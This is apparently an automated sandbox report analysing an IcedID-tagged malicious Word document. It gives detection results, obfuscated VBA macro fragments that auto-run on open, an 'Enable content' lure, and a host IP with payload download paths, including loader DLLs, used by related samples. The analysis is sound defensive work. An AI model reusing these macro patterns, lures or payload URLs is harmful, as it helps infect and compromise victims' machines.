Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ballfin,file,08.11.22.doc

Overview

General Information

Sample Name:ballfin,file,08.11.22.doc
Analysis ID:682651
MD5:75d17f46accbe980e1deb28dd7513085
SHA1:6ae88b35e85f6fbb55584893f696f859dccfedc2
SHA256:4f479dc5b981aadc01b1f245d8694b1ad043247f04148bbb78a86c8ed530b777
Tags:docIcedID
Infos:

Detection

Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Multi AV Scanner detection for submitted file
Document contains an embedded VBA macro with suspicious strings
Machine Learning detection for sample
Potential document exploit detected (unknown TCP traffic)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
IP address seen in connection with other malware
Document misses a certain OLE stream usually present in this Microsoft Office document type

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2264 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: ballfin,file,08.11.22.docVirustotal: Detection: 23%Perma Link
Source: ballfin,file,08.11.22.docReversingLabs: Detection: 15%
Source: ballfin,file,08.11.22.docJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49174 -> 45.8.146.139:80
Source: global trafficTCP traffic: 192.168.2.22:49173 -> 45.8.146.139:80
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: Joe Sandbox ViewIP Address: 45.8.146.139 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: unknownTCP traffic detected without corresponding DNS query: 45.8.146.139
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A52D94E-FA83-4CAE-B0A1-20CA83D4592A}.tmpJump to behavior

System Summary

barindex
Source: Screenshot number: 8Screenshot OCR: Enable editing" button on the top bar, and then click "Enable content". wa ii: ^ ,uu,m ~ Page
Source: Screenshot number: 8Screenshot OCR: Enable content". wa ii: ^ ,uu,m ~ Page: 1 of 1 I Words: 30 I I :a
Source: ballfin,file,08.11.22.docOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ballfin,file,08.11.22.docOLE, VBA macro line: Set = CallByName((kODKXd767UH("AChdywmAbLxco")), kODKXd767UH("rlsuO4sYe_eK"), VbGet, kODKXd767UH("VUfXb8n"))
Source: ballfin,file,08.11.22.docOLE, VBA macro line: Set = CallByName((), kODKXd767UH("fbDGioXv"), VbGet, )
Source: ballfin,file,08.11.22.docOLE, VBA macro line: Set = CallByName((), kODKXd767UH("tvPEflXhf5Z_"), VbGet, )
Source: ~DFEA0111C716413755.TMP.0.drOLE, VBA macro line: Private Declare PtrSafe Function Lib "kernel32" Alias "VirtualProtect" (ByVal As LongPtr, ByVal As LongPtr, ByVal As LongPtr, As LongPtr) As LongPtr
Source: ~DFEA0111C716413755.TMP.0.drOLE, VBA macro line: Set = CallByName((kODKXd767UH("AChdywmAbLxco")), kODKXd767UH("rlsuO4sYe_eK"), VbGet, kODKXd767UH("VUfXb8n"))
Source: ~DFEA0111C716413755.TMP.0.drOLE, VBA macro line: Set = CallByName((), kODKXd767UH("fbDGioXv"), VbGet, )
Source: ~DFEA0111C716413755.TMP.0.drOLE, VBA macro line: Set = CallByName((), kODKXd767UH("tvPEflXhf5Z_"), VbGet, )
Source: ballfin,file,08.11.22.docOLE, VBA macro line: Private Sub Document_Open()
Source: ~DFEA0111C716413755.TMP.0.drOLE, VBA macro line: Private Sub Document_Open()
Source: ballfin,file,08.11.22.docOLE indicator, VBA macros: true
Source: ~DFEA0111C716413755.TMP.0.drOLE indicator, VBA macros: true
Source: ~WRF{441A99A0-AFC4-432D-B427-555F7ADFCBAE}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFEA0111C716413755.TMP.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ballfin,file,08.11.22.docVirustotal: Detection: 23%
Source: ballfin,file,08.11.22.docReversingLabs: Detection: 15%
Source: ballfin,file,08.11.22.LNK.0.drLNK file: ..\..\..\..\..\Desktop\ballfin,file,08.11.22.doc
Source: ballfin,file,08.11.22.docOLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$llfin,file,08.11.22.docJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR626A.tmpJump to behavior
Source: classification engineClassification label: mal64.expl.winDOC@1/11@0/1
Source: ballfin,file,08.11.22.docOLE document summary: title field not present or empty
Source: ballfin,file,08.11.22.docOLE document summary: author field not present or empty
Source: ballfin,file,08.11.22.docOLE document summary: edited time not present or 0
Source: ~WRF{441A99A0-AFC4-432D-B427-555F7ADFCBAE}.tmp.0.drOLE document summary: title field not present or empty
Source: ~WRF{441A99A0-AFC4-432D-B427-555F7ADFCBAE}.tmp.0.drOLE document summary: author field not present or empty
Source: ~WRF{441A99A0-AFC4-432D-B427-555F7ADFCBAE}.tmp.0.drOLE document summary: edited time not present or 0
Source: ~DFEA0111C716413755.TMP.0.drOLE document summary: title field not present or empty
Source: ~DFEA0111C716413755.TMP.0.drOLE document summary: author field not present or empty
Source: ~DFEA0111C716413755.TMP.0.drOLE document summary: edited time not present or 0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: ballfin,file,08.11.22.docInitial sample: OLE zip file path = docProps/custom.xml
Source: ballfin,file,08.11.22.docStatic file information: File size 2298562 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: ~WRF{441A99A0-AFC4-432D-B427-555F7ADFCBAE}.tmp.0.drInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts12
Scripting
Path InterceptionPath Interception1
Masquerading
OS Credential Dumping1
File and Directory Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Ingress Tool Transfer
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Exploitation for Client Execution
Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
Disable or Modify Tools
LSASS Memory1
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)12
Scripting
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ballfin,file,08.11.22.doc23%VirustotalBrowse
ballfin,file,08.11.22.doc16%ReversingLabsScript-Macro.Trojan.Amphitryon
ballfin,file,08.11.22.doc100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\~DFEA0111C716413755.TMP100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No contacted domains info
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs
IPDomainCountryFlagASNASN NameMalicious
45.8.146.139
unknownRussian Federation
44676VMAGE-ASRUfalse
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:682651
Start date and time:2022-08-11 20:10:07 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 5m 39s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:ballfin,file,08.11.22.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Run name:Without Instrumentation
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.winDOC@1/11@0/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): dllhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
45.8.146.139valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/U-CXQ4A0CVQ_DMT42DN0TYZCE_E_1XMH/-f
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/SKWR8YXON-RX9R4781JWMO3UUH0NGDBO/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
cnewton doc 08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/NH1-X8NL7CO4_YNJ-MEFY7BW9QYIJW1I/-f
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
airequipmentcorp-doc-08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/82PF9MOX9VRXL73GMCXOFE8AGP5ROGT8/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
wpswireless-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/_C45V3_-S5YKINT86D3PPVX0ILQLA-SG/rm
courtesyautomotivedoc08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/A2-7QTSJAH4Z96EKN5E88X3UNK3NGY5I/loader_p3_dll_64_n5_crypt_x64_asm_clone_n13.dll
drinkcodeblue.file.08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/IJQ_OLG8QW9DFH32ZO8BOJQ-PC_3SXMS/rm
dodsonimaging,file,08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/O-M--V4GO6516F-U91Z1DJNJ2U9D-823/rm
feltenberger doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/R_PVSJYED3P2FDSONZYADP8GFZZLOA8D/loader_p3_dll_64_n5_crypt_x64_asm_clone_n101.dll
agsilverfile08.11.docGet hashmaliciousBrowse
  • 45.8.146.139/fhfty/A0S35FRY5H5A0Q5SG6-TE3J_HSFO5KES/loader_p3_dll_64_n5_crypt_x64_asm_clone_n19.dll
No context
MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
VMAGE-ASRUcis-broadband invoice 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
airdynefile08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
samarthcars-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
ballfin,file,08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
airdynefile08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
samarthcars-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
ballfin,file,08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
samarthcars-invoice-08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
berniesbooksdocument08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
c9sllc.invoice.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
berniesbooksdocument08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
actionplan doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
c9sllc.invoice.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
berniesbooksdocument08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
actionplan doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
c9sllc.invoice.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
actionplan doc 08.11.docGet hashmaliciousBrowse
  • 45.8.146.139
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
valliant.document.08.11.2022.docGet hashmaliciousBrowse
  • 45.8.146.139
suddenlink file 08.11.22.docGet hashmaliciousBrowse
  • 45.8.146.139
No context
No context
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:PNG image data, 410 x 568, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):61935
Entropy (8bit):7.988218918927523
Encrypted:false
SSDEEP:1536:vFo53cC4vJ7Y8qgUmqhIIPI2MM+ikJU78DPaFx:vy53qv6nmII0I2ngJAEan
MD5:4800E90C87A78932178C7D338BA32F43
SHA1:8006244EDAFF9A31546A17FCF99CB61DA4F69417
SHA-256:8CD11EB654C64C7315F7B2904D123532F7993FAF2F210B250C4C4D670200FF73
SHA-512:58994BDC81FF937B05B307C161F852383DAA8504EA17522CD96CDE6EBF99E4992BA64DBEA532424AC16FBD8273999295DBBB74E48A77AAB2122C5701633DC7A3
Malicious:false
Reputation:moderate, very likely benign file
